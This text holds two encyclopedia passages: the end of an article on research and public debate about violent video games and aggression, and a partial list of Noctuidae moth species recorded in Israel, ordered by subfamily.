other methodological flaws. Anderson's group have defended their analysis, rejecting these critiques. Rowell Huesmann, a psychology and social studies academic at the University of Michigan wrote an editorial supporting the Anderson meta-analysis. A later re-analysis of the Anderson meta-analysis suggested that there was greater publication bias among experiments than Anderson and colleagues had accounted for. This indicated that the effects observed in laboratory experiments may have been smaller than estimated and perhaps not statistically significant. A reply by Anderson and colleagues acknowledged that there was publication bias among experiments, but disagreed that the degree of bias was large enough to bring the effect into question. A 2015 meta-analysis of video game effects suggested that video games, including violent games, had minimal impact on children's behavior including violence, prosocial behavior and mental health. The journal included a debate section on this meta-analysis including scholars who were both supportive and critical of this meta-analysis. The original author also responded to these comments, arguing that few coherent methodological critiques had been raised. In 2016, Kanamori and Doi replicated the original Angry Birds meta-analysis and concluded that critiques of the original meta were largely unwarranted. In 2018, a meta-analysis of the relationship between violent video game play and physical aggression over time found that "violent video game play is positively associated with aggressive behavior, aggressive cognition, and aggressive affect, as well as negatively associated with empathy for victims of violence and with prosocial behavior". A 2020 meta-analysis of long-term outcome studies concluded that evidence did not support links between earlier playing of violent games and later aggression. The authors found an overall correlation of , and stated that better quality studies were less likely to find evidence for effects than poorer quality studies. fMRI studies Some scholars worry there may be an effect of violent video games on brain activity, although such concerns are highly contentious. Some scientists have attempted to use functional magnetic resonance imaging to study this hypothesis. Some studies suggested that participants who engaged with VVGs displayed increases in the functioning of their amygdala and decreases in the functioning of their frontal lobe. Some scholars argue that the effect on the frontal lobe may be similar to the deactivation seen in disruptive behavior disorders. However, potential funding conflicts of interest have been noted for some of these studies. During the Brown Vs. EMA legal case, it was noted that the studies conducted by Kronenberger were openly funded by "The Center for Successful Parenting", which may mean a conflict of interest. Further, other studies have failed to find a link between violent games and diminished brain function. For example, an fMRI study by Regenbogen and colleagues suggested VVGs do not diminish the ability to differentiate between real and virtual violence. Another study from 2016 using fMRI found no evidence that VVGs led to a desensitization effect in players. In a recent BBC interview, Dr. Simone Kuhn explained that the brain effects seen in prior fMRI studies likely indicated that players were simply able to distinguish between reality and fiction and modulate their emotional reaction accordingly, not becoming desensitized. Studies on the effect on crime In 2008, records held by the US Office of Juvenile Justice and Delinquency Prevention and Office of Justice Programs indicated that arrests for violent crime in the US had decreased since the early 1990s in both children and adults. This decrease occurred contemporaneously with increasing sales of violent video games and increases in graphically violent content in those games. Studies of violent video game playing and crime have generally not supported the existence of causal links. Evidence from studies of juveniles as well as criminal offenders has generally not uncovered evidence for links. Some studies have suggested that violent video game playing may be associated with reductions in some types of aggression, such as bullying. Studies of mass shootings have, likewise, provided no evidence for links with violent video games. A 2002 report from the US Secret Service found that school shooters appeared to consume relatively low levels of violent media. Some criminologists have specifically referred to claims linking violent video games to mass shootings as a "myth". Some studies have examined the consumption of violent video games in society and violent crime rates. Generally, it is acknowledged that societal violent video game consumption has been associated with over an 80% reduction in youth violence in the US during the corresponding period. However, scholars note that, while this data is problematic for arguments that violent video games increase crime, such data is correlational and can't be used to conclude video games have caused this decline in crime. Other studies have examined data on violent video games and crime trends more closely and have come to the conclusion that the release of very popular violent video games are causally associated with corresponding declines in violent crime in the short term. A 2011 study by the Center for European Economic Research found that violent video games may be reducing crime. This is possibly because the time spent playing games reduces time spent engaged in more antisocial activities. Other recent studies by Patrick Markey and Scott Cunningham have come to similar conclusions. Public debate in US In the early 1980s, Ronnie Lamm, the president of the Long Island PTA sought legislation to govern the proximity of video game arcades to schools. In the 1990s, Joe Lieberman, a US Senator, chaired a hearing about violent video games such as Mortal Kombat. David Grossman, a former West Point psychology professor and lieutenant commander, wrote books about violence in the media including: On Killing (1996) and Stop Teaching Our Kids to Kill (1999). He described first-person shooter games as murder simulators, and argued that video game publishers unethically train children in the use of weapons and harden them emotionally towards commitments of murder by simulating the killing of hundreds or thousands of opponents in a single typical video game. In 2003, Craig A. Anderson, a researcher who testified on the topic before the U.S. Senate, said, "[S]ome studies have yielded nonsignificant video game effects, just as some smoking studies failed to find a significant link to lung cancer. But when one combines all relevant empirical studies using meta-analytic techniques, it shows that violent video games are significantly associated with: increased aggressive behavior, thoughts, and affect; increased physiological arousal; and decreased pro-social (helping) behavior." In 2005, Anderson was criticized in court for failing to give balanced expert evidence. In 2008, in Grand Theft Childhood: The Surprising Truth About Violent Video Games and What Parents Can Do, Kutner and Olsen refuted claims that violent video games cause an increase in violent behavior in children. They report there is a scientifically non-significant trend showing that adolescents who do not play video games at all are most at risk for violent behavior and video game play is part of an adolescent boy's normal social setting. However, the authors did not completely deny the negative influences of violent (M-rated) video games on pre-teens and teenagers: Kutner and Olson suggested the views of alarmists and those of representatives of the video game industry are often supported by flawed or misconstrued studies and that the factors leading to violence in children and adolescents were more subtle than whether or not they played violent video games. Henry Jenkins, an academic in media studies, said, "According to federal crime statistics, the rate of juvenile violent crime in the United States is at a 30-year low. Researchers find that people serving time for violent crimes typically consume less media before committing their crimes than the average person in the general population. It's true that young offenders who have committed school shootings in America have also been game players. But young people in general are more likely to be gamers—90 percent of boys and 40 percent of girls play. The overwhelming majority of kids who play do not commit antisocial acts. According to a 2001 U.S. Surgeon General's report, the strongest risk factors for school shootings centered on mental stability and the quality of home life, not media exposure. The moral panic over violent video games is doubly harmful. It has led adult authorities to be more suspicious and hostile to many kids who already feel cut off from the system. It also misdirects energy away from eliminating the actual causes of youth violence and allows problems to continue to fester." In 2013, Corey Mead, a professor of English at Baruch College, wrote about how the U.S. military financed the original development of video games, and has long used them for both training, recruitment purposes, and treatment of post traumatic stress disorder. He also argues that the two industries are currently intertwined into each other in a "military-entertainment complex". Writing in 2013, scholars James Ivory and Malte Elson noted that, although research on video game effects remained inconclusive, the culture of the academic field itself had become very contentious and that politicians had put pressure on scientists to produce specific research findings. The authors concluded it is improper for scholars or legislators to, at present, portray video games as a public health crisis. Research by Oxford psychologist Andrew Przybylski has shown that Americans are split in opinion on how video game violence links to gun violence. Przybylski found that older people, women rather than men, people who knew less about games and who were very conservative in ideology were most likely to think video games could cause gun violence. Several groups address video game violence as a topic that they focus on. Groups such as Parents Against Violence, Parents Against Media Violence and One Million Moms take stances aimed at limiting the violence in video games and other media. Groups such as the Entertainment Software Association seek to refute their claims. Video games, particularly violent ones, are often mentioned as a cause for major gun crimes in the wake of school shooting by young adults. For example, Adam Lanza, the 20-year-old shooter at the Sandy Hook Elementary School shooting, was found to have numerous video games in his possession, leading for some people to blame video games for the shooting; however, the State Attorney did not link video game to the event in their final report of the incident, though identified that video game addiction may have been connected. In February 2018, following the Stoneman Douglas High School shooting in Florida, President Donald Trump, among others, said "the level of violence on video games is really shaping young people's thoughts". Rhode Island state representative Robert Nardolillo also proposed legislation to tax violent video games (those rated "Mature" or higher by the ESRB) to use funds for supporting mental health programs in the state. Following the Stoneman Douglas shooting event, President Trump arranged to meet with several video game industry professionals on March 8, 2018; in attendance beyond Trump and other Congressmen included Mike Gallagher, the president and CEO of the ESA; Pat Vance, the president of the ESRB; Strauss Zelnick, CEO of Take Two Interactive, Robert Altman, CEO of ZeniMax Media; Brent Bozell, founder of the Media Research Center; and Melissa Hanson, program manager for the Parents Television Council. The meeting was not designed to come to a solution but only for the invited parties to present their stance on video games and their relationship to violent activity as to try to determine appropriate steps in the future. At the start of the meeting, the President showed the attendees a short 88-second video of numerous violent video game segments put together by his staff, including the infamous "No Russian" level from Call of Duty: Modern Warfare 2, which featured the player watching and potentially participating in a massacre of civilians in an airport. The White House later released the video to YouTube, where it quickly became popular due to the controversy over the relationship between video games and real-life violence; despite being unlisted shortly after being uploaded, it has reached a 2.7 thousand to 93 thousand like-to-dislike ratio as of April 5, 2018. The video is still accessible via URL, and media outlets like IGN included links to the original in their responses to the matter. Games for Change made an 88-second video of their own, composed of video game segments and cutscenes more cinematic and emotional in nature; their video has received upwards of 463,000 views as of April 5, 2018, as well as a 13 thousand to 203 like-to-dislike ratio. In the description of the video, they said,"After seeing that the White House produced a video depicting video games as ultra-violent, we felt compelled to share a different view of games. Video games, their innovative creators and the vast community of players are so much more than what is depicted in the White House’s video. We wanted to create our own version, at the same length, to challenge the White House’s misdirected blame being placed upon video games. To all you game developers and players who create and enjoy games – this is for you! #GAMEON" Nation-specific factors Australia Video games are rated in Australia by the Australian Classification Board (ACB), run out of the federal Attorney-General's Department. ACB also oversees ratings on films and applies the same ratings system as to video games. Broadly, the ratings system is based on a number of factors including violence. The ACB can refuse to classify a film or game if they felt the content was beyond allowable guidelines for the strictest ratings. Titles refused classification by ACB are thus illegal to sell within Australia and assess fines fort those that attempted to import such games, while allowing titles with more mature ratings to be sold under regulated practices. Prior to 2011, video games could only qualify up to a "MA15+" rating, and not the next highest tier of "R18+" which were allowed for film. Several high-profile games thus were banned in Australia. The ACB agreed to allow video games to have R18+ ratings in 2011, and some of these games that were previously banned were subsequently allowed under R18+. References External links Video gaming Violence in video games Video game controversies Moral panic
24284823
https://en.wikipedia.org/wiki/List%20of%20moths%20of%20Israel%20%28Noctuidae%29
List of moths of Israel (Noctuidae)
This is a list of moths of the family Noctuidae (sensu Kitching & Rawlins, 1999) that are found in Israel. It also acts as an index to the species articles and forms part of the full List of moths of Israel. Subfamilies are listed alphabetically. Subfamily Acontiinae Acontia biskrensis (Oberthür, 1887) Acontia lucida (Hüfnagel, 1766) Acontia titania (Esper, 1798) Acontia trabealis (Scopoli, 1763) Aedia funesta (Esper, 1786) Aedia leucomelas (Linnaeus, 1758) Armada maritima Brandt, 1939 Armada nilotica A. Bang-Haas, 1912 Armada panaceorum (Ménétriès, 1849) Coccidiphaga scitula (Rambur, 1833) Diloba caeruleocephala (Linnaeus, 1758) Tarachephia hueberi (Ershov, 1874) Subfamily Acronictinae Acronicta aceris (Linnaeus, 1758) Acronicta psi (Linnaeus, 1758) Acronicta pasiphae Draudt, 1936 Acronicta rumicis (Linnaeus, 1758) Acronicta tridens [Denis & Schiffermüller, 1775] Craniophora ligustri (Denis & Schiffermüller, 1775) Craniophora pontica (Staudinger, 1879) Craniophora melanisans Wiltshire, 1980 Subfamily Amphipyrinae Pyrois effusa (Boisduval, 1828) Amphipyra pyramidea (Linnaeus, 1758) Amphipyra micans Lederer, 1857 Amphipyra boursini Hacker, 1998 Amphipyra tetra (Fabricius, 1787) Amphipyra stix Herrich-Schäffer, 1850 Subfamily Bagisarinae Ozarba sancta (Staudinger, 1900) Pseudozarba bipartita (Herrich-Schäffer, 1850) Pseudozarba mesozona (Hampson, 1896) Xanthodes albago (Fabricius, 1794) Subfamily Bryophilinae Cryphia algae (Fabricius, 1775) Cryphia ochsi (Boursin, 1941) Cryphia tephrocharis Boursin, 1953 Cryphia rectilinea (Warren, 1909) Cryphia amseli Boursin, 1952 Cryphia labecula (Lederer, 1855) Cryphia raptricula ([Denis & Schiffermüller], 1775) Cryphia petrea (Guenée, 1852) Cryphia maeonis (Lederer, 1865) Cryphia paulina (Staudinger, 1892) Cryphia amasina (Draudt, 1931) Simyra dentinosa Freyer, 1839 Victrix tabora (Staudinger, 1892) Victrix marginelota (de Joannis, 1888) Subfamily Catocalinae Acantholipes circumdata (Walker, 1858) Acantholipes regularis (Hübner, [1813]) Aedia funesta (Esper, [1786]) Aedia leucomelas (Linnaeus, 1758) Africalpe intrusa Krüger, 1939 Anomis flava (Fabricius, 1775) Anomis sabulifera (Guenée, 1852) Antarchaea erubescens (A. Bang-Haas, 1906) Anumeta arabiae Wiltshire, 1961 Anumeta asiatica Wiltshire, 1961 Anumeta atrosignata (Walker, 1858) Anumeta hilgerti Rothschild, 1909 Anumeta spilota Ershov, 1874 Anumeta straminea (A. Bang-Haas, 1906) Anydrophila stuebeli (Calberla, 1891) Apopestes spectrum (Esper, [1787]) Armada maritima Brandt, 1939 Armada nilotica (A. Bang-Haas, 1906) Armada panaceorum (Ménétries, 1849) Autophila anaphanes Boursin, 1940 Autophila cerealis (Staudinger, 1871) Autophila einsleri Amsel, 1935 Autophila libanotica (Staudinger, 1901) Autophila ligaminosa (Eversmann, 1851) Autophila limbata (Staudinger, 1871) Autophila pauli Boursin, 1940 Catephia alchymista ([Denis & Schiffermüller, 1775) Catocala amnonfreidbergi (Kravchenko et al., 2008) Catocala brandti Hacker & Kaut, 1999 Catocala conjuncta (Esper, [1787]) Catocala conversa (Esper, [1787]) Catocala disjuncta (Geyer, 1828) Catocala diversa (Geyer, [1828]) Catocala editarevayae Kravchenko et al., 2008 Catocala elocata (Esper, [1787]) Catocala eutychea (Treitschke, 1835) Catocala hymenaea ([Denis & Schiffermüller], 1775) Catocala lesbia Christoph, 1887 Catocala nymphaea (Esper, [1787]) Catocala nymphagoga (Esper, [1787]) Catocala olgaorlovae Kravchenko et al., 2008 Catocala puerpera (Giorna, 1791) Catocala separata (Freyer, 1848) Cerocala sana Staudinger, 1901 Clytie arenosa Rothschild, 1913 Clytie delunaris (Staudinger, 1889) Clytie haifae (Habich, 1905) Clytie illunaris (Hübner, [1813]) Clytie infrequens (C. Swinhoe, 1884) Clytie sancta (Staudinger, 1898) Clytie scotorrhiza Hampson, 1913 Clytie syriaca (Bugnion, 1837) Clytie terrulenta (Christoph, 1893) Crypsotidia maculifera (Staudinger, 1898) Drasteria cailino (Lefèbvre, 1827) Drasteria flexuosa (Ménétries, 1847) Drasteria herzi (Alphéraky, 1895) Drasteria kabylaria (A. Bang-Haas, 1906) Drasteria oranensis Rothschild, 1920 Dysgonia algira (Linnaeus, 1767) Dysgonia rogenhoferi (Bohatsch, 1880) Dysgonia torrida (Guenée, 1852) Epharmottomena eremophila (Rebel, 1895) Exophyla rectangularis (Geyer, [1828]) Gnamptonyx innexa (Walker, 1858) Grammodes bifasciata (Petagna, 1788) Heteropalpia acrosticta (Püngeler, 1904) Heteropalpia profesta (Christoph, 1887) Iranada turcorum (Zerny, 1915) Lygephila craccae (Denis & Schiffermüller, 1775) Lygephila lusoria (Linnaeus, 1758) Minucia lunaris (Denis & Schiffermüller, 1775) Minucia wiskotti (Püngeler, 1902) Ophiusa tirhaca (Cramer, 1777) Pandesma robusta (Walker, 1858) Pericyma albidentaria (Freyer, 1842) Pericyma squalens Lederer, 1855 Plecoptera inquinata (Lederer, 1857) Plecoptera reflexa Guenée, 1852 Prodotis boisdeffrii (Oberthür, 1867) Prodotis stolida (Fabricius, 1775) Rhabdophera arefacta (C. Swinhoe, 1884) Scodionyx mysticus Staudinger, 1900 Scoliopteryx libatrix (Linnaeus, 1758) Tarachephia hueberi (Ershov, 1874) Tathorhynchus exsiccata (Lederer, 1855) Tyta luctuosa (Denis & Schiffermüller, 1775) Tytroca dispar (Püngeler, 1904) Tytroca leucoptera (Hampson, 1896) Ulotrichopus tinctipennis stertzi (Püngeler, 1907) Zethes insularis Rambur, 1833 Subfamily Condicinae Condica capensis (Guenée, 1852) Condica viscosa (Freyer, 1831) Condica palaestinensis (Staudinger, 1895) Subfamily Cuculliinae Brachygalea albolineata (Blachier, 1905) Brachygalea kalchbergi (Staudinger, 1892) Lithophasia quadrivirgula (Mabille, 1888) Lithophasia venosula Staudinger, 1892 Metlaouia autumna (Chrétien, 1910) Cucullia syrtana (Mabille, 1888) Cucullia argentina (Fabricius, 1787) Cucullia santolinae Rambur, 1834 Cucullia calendulae Treitschke, 1835 Cucullia santonici (Hübner, [1813]) Cucullia boryphora Fischer de Waldheim, 1840 Cucullia improba Christoph, 1885 Cucullia macara Rebel, 1948 Shargacucullia blattariae (Esper, 1790) Shargacucullia barthae (Boursin, 1933) Shargacucullia lychnitis (Rambur, 1833) Shargacucullia anceps (Staudinger, 1882) Shargacucullia strigicosta (Boursin, 1940) Shargacucullia macewani (Wiltshire, 1949) Shargacucullia verbasci (Linnaeus, 1758) Calocucullia celsiae (Herrich-Schäffer, 1850) Metalopha gloriosa (Staudinger, 1892) Metalopha liturata (Christoph, 1887) Calophasia platyptera (Esper, [1788]) Calophasia barthae Wagner, 1929 Calophasia angularis (Chrétien, 1911) Calophasia sinaica (Wiltshire, 1948) Pamparama acuta (Freyer, 1838) Cleonymia jubata (Oberthür, 1890) Cleonymia warionis (Oberthür, 1876) Cleonymia opposita (Lederer, 1870) Cleonymia pectinicornis (Staudinger, 1859) Cleonymia baetica (Rambur, 1837) Cleonymia chabordis (Oberthür, 1876) Cleonymia fatima (Bang-Haas, 1907) Teinoptera culminifera Calberla, 1891 Teinoptera gafsana (Blachier, 1905) Omphalophana antirrhinii (Hübner, [1803]) Omphalophana anatolica (Lederer, 1857) Omphalophana pauli (Staudinger, 1892) Recophora beata (Staudinger, 1892) Metopoceras omar (Oberthür, 1887) Metopoceras delicata (Staudinger, 1898) Metopoceras philbyi Wiltshire, 1980 Metopoceras solituda (Brandt, 1938) Metopoceras kneuckeri (Rebel, 1903) Metopoceras felicina (Donzel, 1844) Rhabinopteryx subtilis (Mabille, 1888) Oncocnemis confusa persica persica Ebert, 1878 Oncocnemis exacta Christoph, 1887 Oncocnemis strioligera Lederer, 1853 Xylocampa mustapha Oberthür, 1920 Stilbia syriaca Staudinger, 1892 Stilbina hypaenides Staudinger, 1892 Hypeuthina fulgurita Lederer, 1855 Subfamily Eriopinae Callopistria latreillei (Duponchel, 1827) Subfamily Eublemminae Calymma communimacula ([Denis & Schiffermüller], 1775) Eublemma albina (Staudinger, 1898) Eublemma albivestalis Hampson, 1910 Eublemma apicipunctalis (Brandt, 1939) Eublemma cynerea (Turati, 1924) Eublemma cochylioides (Guenée, 1852) Eublemma cornutus Fibiger & Hacker, 2004 Eublemma deserti Rothschild, 1909 Eublemma gayneri (Rothschild, 1901) Eublemma gratissima (Staudinger, 1892) Eublemma hansa (Herrich-Schäffer, 1851) Eublemma kruegeri (Wiltshire, 1970) Eublemma ostrina (Hübner, 1808) Eublemma pallidula (Herrich-Schäffer, 1856) Eublemma parva (Hübner, 1808) Eublemma polygramma (Duponchel, 1836) Eublemma scitula (Rambur, 1833) Eublemma siticulosa (Lederer, 1858) Eublemma subvenata (Staudinger, 1892) Eublemma suppura (Staudinger, 1892) Eublemma tomentalis Rebel, 1947 Honeyana ragusana (Freyer, 1844) Rhypagla lacernaria (Hübner, 1813) Metachrostis dardouini (Boisduval, 1840) Metachrostis velox (Hübner, 1813) Metachrostis velocior Staudinger, 1892 Subfamily Eustrotiinae Eulocastra diaphora (Staudinger, 1879) Subfamily Euteliinae Eutelia adulatrix (Hübner, 1813) Eutelia adoratrix (Staudinger, 1892) Subfamily Hadeninae Orthosia cruda Denis & Schiffermüller, 1775 Orthosia cypriaca Hacker, 1996 Orthosia cerasi (Fabricius, 1775) Perigrapha mundoides (Boursin, 1940) Egira tibori Hreblay, 1994 Tholera hilaris (Staudinger, 1901) Anarta sabulorum (Alphéraky, 1882) Anarta engedina Hacker, 1998 Anarta arenbergeri (Pinker, 1974) Anarta mendax (Staudinger, 1879) Anarta mendica (Staudinger, 1879) Anarta trifolii (Hufnagel, 1766) Anarta stigmosa (Christoph, 1887) Cardepia sociabilis (Graslin, 1850) Cardepia affinis Rothschild, 1913 Thargelia gigantea Rebel, 1909 Odontelia daphnadeparisae Kravchenko, Ronkay, Speidel, Mooser & Müller, 2007 Lacanobia oleracea (Linnaeus, 1758) Lacanobia softa (Staudinger, 1898) Sideridis implexa (Hübner, 1813) Dicerogastra chersotoides (Wiltshire, 1956) Saragossa siccanorum (Staudinger, 1870) Hecatera bicolorata (Hufnagel, 1766) Hecatera weissi (Boursin, 1952) Hecatera dysodea (Denis & Schiffermüller, 1775) Hecatera cappa (Hübner, 1809) Hecatera fixseni (Christoph, 1883) Enterpia laudeti (Boisduval, 1840) Hadena magnolii (Boisduval, 1829) Hadena compta ([Denis & Schiffermüller], 1775) Hadena adriana (Schawerda, 1921) Hadena gueneei (Staudinger, 1901) Hadena clara (Staudinger, 1901) Hadena persimilis Hacker, 1996 Hadena drenowskii (Rebel, 1930) Hadena syriaca (Osthelder, 1933) Hadena perplexa ([Denis & Schiffermüller], 1775) Hadena silenes (Hübner, 1822) Hadena sancta (Staudinger, 1859) Hadena pumila (Staudinger, 1879) Hadena silenides (Staudinger, 1895) Mythimna ferrago (Fabricius, 1787) Mythimna vitellina (Hübner, 1808) Mythimna straminea (Treitschke, 1825) Mythimna congrua (Hübner, 1817) Mythimna languida (Walker, 1858) Mythimna l-album (Linnaeus, 1767) Mythimna sicula (Treitschke, 1835) Mythimna alopecuri (Boisduval, 1840) Mythimna riparia (Rambur, 1829) Mythimna unipuncta (Haworth, 1809) Leucania putrescens (Hübner, 1824) Leucania punctosa (Treitschke, 1825) Leucania herrichii Herrich-Schäffer, 1849 Leucania palaestinae Staudinger, 1897 Leucania joannisi Boursin & sporten, 1952 Leucania zeae (Duponchel, 1827) Leucania loreyi (Duponchel, 1827) Polytela cliens (Felder & Rogenhofer, 1874) Subfamily Heliothinae Chazaria incarnata (Freyer, 1838) Heliothis viriplaca (Hufnagel, 1766) Heliothis nubigera (Herrich-Schäffer, 1851) Heliothis peltigera ([Denis & Schiffermüller], 1775) Helicoverpa armigera (Hübner, [1808]) Schinia scutosa ([Denis & Schiffermüller], 1775) Periphanes delphinii (Linnaeus, 1758) Pyrrhia treitschkei (Frivaldsky, 1835) Aedophron phlebophora (Lederer, 1858) Masalia albida (Hampson, 1905) Subfamily Hypeninae Nodaria nodosalis (Herrich-Schäffer, [1851]) Polypogon lunalis (Scopoli, 1763) Polypogon plumigeralis (Hübner, [1825]) Hypena obsitalis (Hübner, [1813]) Hypena lividalis (Hübner, 1796) Hypena munitalis Mann, 1861 Zekelita antiqualis (Hübner, [1809]) Zekelita ravalis (Herrich-Schäffer, 1851) Subfamily Hypenodinae Schrankia costaestrigalis (Stephens 1834) Schrankia taenialis (Hübner, [1809]) Subfamily Metoponiinae Aegle semicana (Esper, 1798) Aegle rebeli Schawerda, 1923 Aegle exquisita Boursin, 1969 Aegle ottoi (Schawerda, 1923) Megalodes eximia (Freyer, 1845) Haemerosia renalis (Hübner, 1813) Haemerosia vassilininei A. Bang-Haas, 1912 Tyta luctuosa [Denis & Schiffermüller, 1775] Epharmottomena eremophila (Rebel, 1895) Iranada turcorum (Zerny, 1915) Subfamily Noctuinae Euxoa anarmodia (Staudinger, 1897) Euxoa aquilina (Denis & Schiffermüller, 1775) Euxoa cos (Hübner, [1824]) Euxoa canariensis (Rebel, 1902) Euxoa conspicua (Hübner, [1827]) Euxoa distinguenda (Lederer, 1857) Euxoa foeda (Lederer, 1855) Euxoa heringi (Staudinger, 1877) Euxoa nigrofusca (Esper, [1788]) Euxoa oranaria (Bang-Haas, 1906) Euxoa robiginosa (Staudinger, 1895) Euxoa temera (Hübner, [1808]) Agrotis spinifera (Hübner, [1808]) Agrotis segetum ([Denis & Schiffermüller], 1775) Agrotis trux (Hübner, [1824]) Agrotis exclamationis (Linnaeus, 1758) Agrotis scruposa (Draudt, 1936) Agrotis alexandriensis Bethune-Baker, 1894 Agrotis herzogi Rebel, 1911 Agrotis haifae Staudinger, 1897 Agrotis sardzeana Brandt, 1941 Agrotis ipsilon (Hüfnagel, 1766) Agrotis puta (Hübner, [1803]) Agrotis syricola Corti & Draudt, 1933 Agrotis bigramma (Esper, [1790]) Agrotis obesa (Boisduval, 1829) Agrotis pierreti (Bugnion, 1837) Agrotis psammocharis Boursin, 1950 Agrotis lasserrei (Oberthür, 1881) Agrotis boetica (Boisduval, [1837]) Agrotis margelanoides (Boursin, 1944) Pachyagrotis tischendorfi (Püngeler, 1925) Dichagyris rubidior (Corti, 1933) Dichagyris terminicincta (Corti, 1933) Dichagyris candelisequa ([Denis & Schiffermüller], 1775) Dichagyris elbursica (Draudt, 1937) Dichagyris leucomelas Brandt, 1941 Dichagyris melanuroides Kozhantshikov, 1930 Dichagyris melanura (Kollar, 1846) Dichagyris imperator (Bang-Haas, 1912) Dichagyris pfeifferi (Corti & Draudt, 1933) Dichagyris singularis (Staudinger, 1892) Dichagyris erubescens (Staudinger, 1892) Dichagyris devota (Christoph, 1884) Dichagyris amoena Staudinger, 1892 Dichagyris anastasia (Draudt, 1936) Yigoga romanovi (Christoph, 1885) Yigoga flavina (Herrich-Schäffer, 1852) Yigoga nigrescens (Höfner, 1887) Yigoga libanicola (Corti & Draudt, 1933) Yigoga truculenta Lederer, 1853 Stenosomides sureyae facunda (Draudt, 1938) Standfussiana defessa (Lederer, 1858) Rhyacia arenacea (Hampson, 1907) Chersotis ebertorum Koçak, 1980 Chersotis elegans (Eversmann, 1837) Chersotis multangula (Hübner, [1803]) Chersotis capnistis (Lederer, 1872) Chersotis margaritacea (Villers, 1789) Chersotis fimbriola (Esper, [1803]) Chersotis laeta (Rebel, 1904) Ochropleura leucogaster (Freyer, 1831) Basistriga flammatra (Denis & Schiffermüller], 1775) Noctua orbona (Hufnagel, 1766) Noctua pronuba (Linnaeus, 1758) Noctua comes Hübner, [1813] Noctua janthina ([Denis & Schiffermüller], 1775) Noctua tertia Mentzer, Moberg & Fibiger, 1991 Noctua tirrenica (Biebinger, Speidel & Hanigk, 1983) Noctua interjecta Hübner, [1803] Epilecta linogrisea ([Denis & Schiffermüller], 1775) Peridroma saucia (Hübner, [1808]) Eugnorisma pontica (Staudinger, 1892) Xestia sareptana (Herrich-Schäffer, 1851) Xestia castanea (Esper, [1798]) Xestia cohaesa (Herrich-Schäffer, [1849]) Xestia xanthographa ([Denis & Schiffermüller], 1775) Xestia palaestinensis (Kalchberg, 1897) Subfamily Phytometrinae Raparna conicephala (Staudinger, 1870) Antarchaea erubescens (A. Bang-Haas, 1910) Subfamily Plusiinae Abrostola clarissa (Staudinger, 1900) Agrapha accentifera (Lefebvre, 1827) Autographa gamma (Linnaeus, 1758) Chrysodeixis chalcites (Esper, [1789]) Cornutiplusia circumflexa (Linnaeus, 1767) Euchalcia augusta (Staudinger, 1891) Euchalcia emichi (Rogenhofer, 1873) Euchalcia aureolineata Ronkay & Gyulai, 1997 Euchalcia augusta (Staudinger, 1891) Euchalcia maria (Staudinger, 1892) Euchalcia olga Kravchenko, Müller, Fibiger & Ronkay, 2006 Euchalcia paulina (Staudinger, 1892) Macdunnoughia confusa (Stephens, 1850) Trichoplusia vittata (Wallengren, 1856) Thysanoplusia daubei (Boisduval, 1840) Thysanoplusia orichalcea (Fabricius, 1775) Trichoplusia ni (Hübner, [1803]) Trichoplusia circumscripta (Freyer, 1831) Subfamily Psaphidinae Valeria oleagina (Denis and & Schiffermüller, 1775) Valeria josefmooseri Kravchenko, Speidel & Muller, 2006 Valeria thomaswitti Kravchenko, Muller & Speidel 2006 Allophyes benedictina (Staudinger, 1892) Allophyes asiatica (Staudinger, 1892) Subfamily Rivulinae Rivula tanitalis Rebel, 1912 Zebeeba falsalis (Herrich-Schäffer, 1839) Subfamily Xyleninae Spodoptera exigua (Hübner, 1808) Spodoptera cilium (Guenée, 1852) Spodoptera littoralis (Boisduval, 1833) Caradrina agrotina (Staudinger, 1892) Caradrina aspersa (Rambur, 1834) Caradrina kadenii (Freyer, 1836) Caradrina syriaca (Staudinger, 1892) Caradrina panurgia (Boursin, 1939) Caradrina oberthueri (Rothschild, 1913) Caradrina ingrata (Staudinger, 1897) Caradrina flavirena (Guenée, 1852) Caradrina scotoptera (Püngeler, 1914) Caradrina hypostigma (Boursin, 1932) Caradrina amseli (Boursin, 1936) Caradrina clavipalpis (Scopoli, 1763) Caradrina selini Boisduval, 1840 Caradrina levantina Hacker, 2004 Caradrina zandi (Wiltshire, 1952) Caradrina fibigeri Hacker, 2004 Caradrina atriluna (Guenée, 1852) Caradrina zernyi (Boursin, 1936) Caradrina flava (Oberthür, 1876) Caradrina casearia (Staudinger, 1900) Caradrina kravchenkoi Hacker, 2004 Caradrina vicina (Staudinger, 1870) Caradrina alfierii (Boursin, 1937) Caradrina melanurina (Staudinger, 1901) Caradrina bodenheimeri (Draudt, 1934) Hoplodrina ambigua [Denis & Schiffermüller, 1775] Scythocentropus eberti Hacker, 2001 Scythocentropus inquinata (Mabille, 1888) Diadochia stigmatica Wiltshire, 1984 Heterographa puengeleri Bartel, 1904 Catamecia minima (C. Swinhoe, 1889) Dicycla oo (Linnaeus, 1758) Atethmia ambusta [Denis & Schiffermüller, 1775] Atethmia centrago (Haworth, 1809) Eremotrachea bacheri (Püngeler, 1902) Anthracia eriopoda (Herrich-Schäffer, 1851) Mormo maura (Linnaeus, 1758) Polyphaenis propinqua (Staudinger, 1898) Olivenebula subsericata Herrich-Schäffer, 1861 Chloantha hyperici [Denis & Schiffermüller, 1775] Phlogophora meticulosa (Linnaeus, 1758) Pseudenargia regina (Staudinger, 1892) Pseudenargia deleta (Osthelder, 1933) Apamea monoglypha (Hufnagel, 1766) Apamea syriaca (Osthelder, 1933) Apamea polyglypha (Staudinger, 1892) Apamea leucodon (Eversmann, 1837) Apamea platinea (Herrich-Schäffer, 1852) Apamea anceps [Denis & Schiffermüller, 1775] Mesoligia literosa (Haworth, 1809) Luperina dumerilii (Duponchel, 1826) Luperina kravchenkoi Fibiger & Müller, 2005 Luperina rjabovi (Kljutschko, 1967) Margelana flavidior F. Wagner, 1931 Gortyna gyulaii Fibiger & Zahiri, 2006 Oria musculosa (Hübner, 1809) Monagria typhae (Thunberg, 1784) Lenisa geminipuncta (Haworth, 1809) Lenisa wiltshirei (Bytinski-Salz, 1936) Arenostola deserticola (Staudinger, 1900) Sesamia ilonae Hacker, 2001 Sesamia cretica Lederer, 1857 Sesamia nonagrioides (Lefèbvre, 1827) Episema tamardayanae Fibiger, Kravchenko, Mooser, Li & Müller, 2006 Episema lederi Christoph, 1885 Episema didymogramma (Boursin, 1955) Episema ulriki Fibiger, Kravchenko & Müller, 2006 Episema korsakovi (Christoph, 1885) Episema lemoniopsis Hacker, 2001 Leucochlaena muscosa (Staudinger, 1892) Leucochlaena jordana Draudt, 1934 Ulochlaena hirta (Hübner, 1813) Ulochlaena gemmifera Hacker 2001 Eremopola lenis (Staudinger, 1892) Tiliacea cypreago (Hampson, 